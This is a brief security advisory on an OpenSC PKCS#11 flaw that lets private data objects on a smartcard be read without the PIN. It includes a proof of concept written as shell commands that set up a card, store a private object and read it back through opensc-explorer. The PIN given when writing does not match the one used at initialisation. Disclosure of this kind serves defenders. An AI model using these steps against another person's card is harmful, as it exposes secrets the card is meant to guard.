OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability

OpenSC PKCS#11 Implementation Unauthorized Access Vulnerability

Attackers would need physical access to the smartcard reader.

The following proof of concept is available:

create a file with a secret:
echo "This is my secret data" > secret-file

To initialise a blank card:
pkcs15-init --create-pkcs15 --use-default-transport-keys --profile pkcs15+onepin --pin 123456 --puk 78907890

To write a private data object to the card:
pkcs11-tool --label "my secret" --type data --write-object secret-file
--private --login --pin 12345

To see all objects on the card:
pkcs15-tool --dump
This will list the data object, including the path it is stored, e.g.:
"Path: 3f0050154701"

To access such an object with low-level tools:

opensc-explorer
cd 5015
get 4701